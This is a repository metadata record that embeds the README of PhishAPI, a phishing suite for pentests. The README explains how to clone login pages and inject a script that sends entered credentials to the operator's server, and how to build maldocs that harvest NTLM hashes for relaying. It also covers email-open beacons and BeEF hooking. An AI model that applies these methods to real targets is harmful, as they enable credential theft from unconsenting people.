{"id":13843354,"url":"https://github.com/curtbraz/PhishAPI","last_synced_at":"2025-07-11T18:32:04.177Z","repository":{"id":50116056,"uuid":"111640844","full_name":"curtbraz/PhishAPI","owner":"curtbraz","description":"Comprehensive Web Based Phishing Suite for Rapid Deployment and Real-Time Alerting!","archived":false,"fork":false,"pushed_at":"2025-03-13T18:52:01.000Z","size":16742,"stargazers_count":377,"open_issues_count":0,"forks_count":86,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-06-28T23:07:08.334Z","etag":null,"topics":["cyberaware","cybersecurity","hacking","infosec","pentesting","phish","phishing","phishing-kit","security","socialengineering"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/curtbraz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-11-22T05:37:29.000Z","updated_at":"2025-06-27T11:49:18.000Z","dependencies_parsed_at":"2022-08-26T12:32:59.413Z","dependency_job_id":"2f3f8e0c-f615-4f9c-af35-49bb3f42abf0","html_url":"https://github.com/curtbraz/PhishAPI","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/curtbraz/PhishAPI","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/
hosts/GitHub/repositories/curtbraz%2FPhishAPI/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/curtbraz","download_url":"https://codeload.github.com/curtbraz/PhishAPI/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264870394,"owners_count":23676221,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cyberaware","cybersecurity","hacking","infosec","pentesting","phish","phishing","phishing-kit","security","socialengineering"],"created_at":"2024-08-04T17:02:00.457Z","updated_at":"2025-07-11T18:32:04.165Z","avatar_url":"https://github.com/curtbraz.png","language":"CSS","funding_links":[],"categories":["PHP (184)","CSS"],"sub_categories":[],"readme":"# PhishAPI\r\n\r\n## Update: As of 3/13/2025 the Community Edition of PhishAPI is no longer supported. A major new release version is available for sale under a Commercial License that includes auto-provisioning of the API and landing pages, advanced analytics, as well as AI and auto-deployed emails. 
Please contact curtis@phishu.net if interested!\r\n\u003cbr\u003e\u003cbr\u003e\r\n\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/M6H7jfg.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eAuto-Generate Fake Portal\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/4TeVrzE.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eCreate Word Maldoc\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/fDwFbHy.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eWeaponize Existing Word Doc\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/xCMqAYc.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eCreate or Leverage Saved Email Campaigns\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\r\n# To Setup (Ubuntu/Debian) :\r\n\r\n1) It's all in Docker now! Clone this repo (`git clone https://github.com/curtbraz/PhishAPI.git`), and `cd PhishAPI`. I typically host on an AWS EC2 Ubuntu instance or on WSL2 locally on Win 10 but you can host it anywhere. Be sure to open up ports TCP/80, 443, 445, \u0026 137-139 to the Internet.\r\n\r\n2) Install docker-compose on Ubuntu with `sudo apt-get install docker-compose -y` and start Docker with `sudo systemctl start docker`.\r\n\r\n3) For HTTPS (RECOMMENDED!), replace the certificate and key (keeping the filenames the same) in `/certs/ssl/` with yours (LetsEncrypt?) and update the domain (ServerName) in `000-default-le-ssl.conf`. Otherwise, skip this step but browsers will warn against POSTing to insecure sites and web push notifications won't work.\r\n\r\n4) Run docker-compose via `docker-compose build` from within the PhishAPI directory. Then, `docker-compose up -d`. 
(`docker-compose down` will kill it)\r\n\r\n5) Visit your URL and configure your settings for notifications first. The Default User/Pass for basic auth is PhishAPI:PhishAPI for the config and reporting pages but I recommend changing this by editing `.htpasswd`. You should be good to go! (By default the web server listens on HTTP/80 and HTTPS/443)\r\n\r\nOR, Copy and Paste the Following in Ubuntu: (skip the certbot and \"cp\" steps if you don't have a cert ready yet)\r\n\r\n\r\n```\r\nsudo apt-get update\r\nsudo apt-get install docker-compose letsencrypt git -y\r\ngit clone https://github.com/curtbraz/PhishAPI.git\r\ncd PhishAPI\r\n```\r\n\r\nSkip this step if you don't have your certs yet.\r\n\r\n```\r\ncertbot certonly --standalone\r\ncp `find /etc/letsencrypt/live/ -name cert.pem` certs/ssl/crt/phishapi.crt\r\ncp `find /etc/letsencrypt/live/ -name privkey.pem` certs/ssl/key/phishapi.key\r\n```\r\n\r\nThen\r\n\r\n```\r\nsudo systemctl start docker\r\nsudo docker-compose build\r\nsudo docker-compose up -d\r\n```\r\n\r\nFinally, if you only want to allowlist yourself while you obtain the certs (highly recommended), edit PhishAPI/html/index.php and change Line 31 to YOUR workstation's public IP address, not the IP of the server. Then comment out Line 32. Otherwise, leave it as-is and it will only block the denylist by default.\r\n\r\n# 1) To Use the API for Capturing Credentials from Fake Sites : \r\n\r\nRapid \u0026 Easy Deployment API for Phishing During Pentest Engagements.  Output to MySQL/Web Table \u0026amp; Slack Bot.  
Supports BEEF Hooking \u0026 HaveIBeenPwned!\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/MKlHy2k.png\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Choose \"Fake Portal\" From API Options\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/UfxzTHQ.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: Choose a Pre-Designed Generic Portal for Landing Page\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/V9GOCZ9.png\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: Fill Out API Details for Landing Page HTML and Optionally Include Your Own Logo\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/4MD7kq5.png\" width=\"70%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: Download Automatically Created Source HTML to Host on a Standalone Server\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/E7ZLcam.png\" width=\"90%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 5: The Hosted Site's Contents\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n## OR\r\n\r\n\u003cb\u003eIf you don't wish to use a pre-populated landing page template or one doesn't exist that you would like to use, feel free to create or clone your own.  
Simply : \u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\r\n\r\n1) Add the external script source in the `\u003chead\u003e` element\r\n\r\n\t`\u003cscript src=\"https://YOUR_PHISHAPI_URL.com/APICredentialFormSubmit.js\"\u003e\u003c/script\u003e`\r\n\r\n2) Change or add an \"onclick\" attribute to the submit button for the login form and fill out the arguments\r\n\r\n\t`\u003cbutton onclick=\"SubForm('PhishAPI_URL_HERE','NAME/ID_OF_LOGIN_FORM','PROJECT_NAME','SLACK_BOT_NAME','SLACK_EMOJI','USER_FIELD_NAME/ID','PASS_FIELD_NAME/ID','SOURCE_URL_HERE','CSRF_TOKEN_HERE')\"\u003eSubmit!\u003c/button\u003e`\r\n\t\r\n\tPhishAPI_URL_HERE = https://YOUR_PHISHAPI_URL.com (wherever you're hosting the API)\u003cbr /\u003e\r\n\tNAME/ID_OF_LOGIN_FORM = Whatever the cloned `\u003cform name=\"\"\u003e` is set to for the page you cloned\u003cbr /\u003e\r\n\tPROJECT_NAME = Self-explanatory. The name of the org/client you're targeting (ex. Walmart)\u003cbr /\u003e\r\n\tSLACK_BOT_NAME = I use \"PhishBot\"\u003cbr /\u003e\r\n\tSLACK_EMOJI = I use `:fishing_pole_and_fish:`\u003cbr /\u003e\r\n\tUSER_FIELD_NAME/ID = Name or ID of the username/email field (ID Preferred) (`\u003cinput name=\"username\"\u003e` or `\u003cinput id=\"user\"\u003e`)\u003cbr /\u003e\r\n\tPASS_FIELD_NAME/ID = Name or ID of the password field (ID Preferred) (`\u003cinput name=\"password\"\u003e` or `\u003cinput id=\"pass\"\u003e`)\u003cbr /\u003e\r\n\tSOURCE_URL_HERE = Original Address You Cloned the Site From (ex. https://TARGET_URL.com/logon.html)\u003cbr /\u003e\r\n\tCSRF_TOKEN_HERE = Leave blank unless the site you're cloning has a CSRF token.  If so provide the Name/ID here (`\u003cinput type=\"hidden\" name=\"csrf_token\" value=\"XDLKJSDLKJLDKJDLKJFSLKLSF\"\u003e` so \"csrf_token\" is what you would use)\r\n\r\n3) Sit back and wait for the Slack bot to notify you.  
When you want to see the credentials visit https://YOUR-API-HERE/results using your basic auth credentials or click the link in the Slack notification.\u003cbr\u003e\u003cbr\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/L8yYRMQ.png\" width=\"70%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 6: Someone Entered Credentials into the Fake Portal - Slack Alert\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/oXy9dEE.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 7: BeEF Hook Slack Alert (Optional in Case You Want to React Quickly w/ Modules)\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/CcSw4TT.png\" width=\"100%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 8: Captured NTLMv2 Hash Exposed via Browser\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/xdeSaWC.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 9: Clicking the Slack Link Allows Viewing Credentials\u003c/b\u003e\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003c/p\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\r\n\r\n# 2) To Use the API for Generating Word Doc Payloads :\r\n\r\n1) Create `/var/www/uploads` Path and `sudo chmod 777 /var/www/uploads -R` the path\r\n\r\n2) Browse out to your hosted API (YOUR_URL.com) and select \"Weaponized Documents\" to generate your DOCX\r\n\r\n3) Optionally set up [Responder](https://github.com/SpiderLabs/Responder \"Responder\") in a background process and run `phishinghashes.sh` every minute or so with cron\r\n\r\n4) Set up your php.ini to allow uploads of at least 15MB and enable browscap.ini for parsing UserAgent strings, otherwise some functionality may be limited.  
\r\n\r\n5) Email your doc and wait for the Slack alerts!\r\n\r\n\u003cp align=\"center\"\u003e\u003cb\u003eBonus points if you use your docs as honeypot bait! :)\u003c/b\u003e\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/LW4BUjN.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Web Based Payload Generation - Create New Doc or Upload Existing w/ Payload Options\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/onsPyFp.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: Opening Document Generated (New) by Service\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/sw8JWQE.png\" width=\"40%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: If \"Auth Prompt\" is Selected in Payload Options, Display Basic Auth Prompt to User for Credential Capturing (like Phishery)\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/HlY3T4G.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: HTTP Beacon is Selected by Default and Alerts When the Target Opens the Document\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/ku6UTNI.png\" width=\"75%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 5: If Credentials are Entered from Figure 3 Above, Notify via Slack When Captured\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/OO0sjDR.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 6: Clicking on the Slack Alert Displays Captured Details (Hashes, Credentials, 
Client Details)\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/qZFGmXA.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 7: Slack Alert when UNC/SMB Hashes are Received from Word Document\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\t\u003cb\u003eCurrently, I'm running \u003ca href=\"https://github.com/SpiderLabs/Responder\"\u003eResponder\u003c/a\u003e in a Screen session with \u003ci\u003ephishinghashes.sh\u003c/i\u003e scheduled via Cron to run every minute to pick up hashes, correlate phished users, and alert via Slack.  You can also relay those hashes with another tool if you'd like to take things even further.  Enjoy! :)\u003c/b\u003e\u003c/p\u003e\r\n\r\n\r\n\r\n\r\n# 3) To Use the API to Store and Generate Email Campaign Templates : \r\n\r\nLeverage a template by creating or choosing an existing template from the local repository, or, you can compose a blank email and embed the invisible HTML beacon to be notified when the recipient opens their email.\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/AmwZbbF.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Existing, New, or No Campaign Choices\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nIf a new campaign is chosen, you can create variables for dynamic re-use in the future and store them as HTML templates in a database.  The WYSIWYG editor makes things simple, but you can also copy and paste from a text editor or another source if you'd like!\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/COHaq6q.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: New Campaign w/ Variables \u0026 Images\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nNext time, choosing the existing template will dynamically provide input fields for the stored variables.  
They can be applied in real time using JavaScript to update the email body.  Checking the \"Embed Notification for Opened Email\" box will automatically append invisible code to your template that will alert you when your recipient opens their email.  (Images must be allowed to render for this to work)\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/SsBAqKv.png\" width=\"75%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: Existing Campaign\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nSit back and watch as your target opens their email and cross your fingers you later receive another alert for BeEF, Maldocs, or your captured credentials!\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/jJ5dGlRr.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: Notification of Email Opened by Recipient\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cb\u003eEnjoy! :)\u003c/b\u003e\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcurtbraz%2FPhishAPI","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcurtbraz%2FPhishAPI","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcurtbraz%2FPhishAPI/lists"}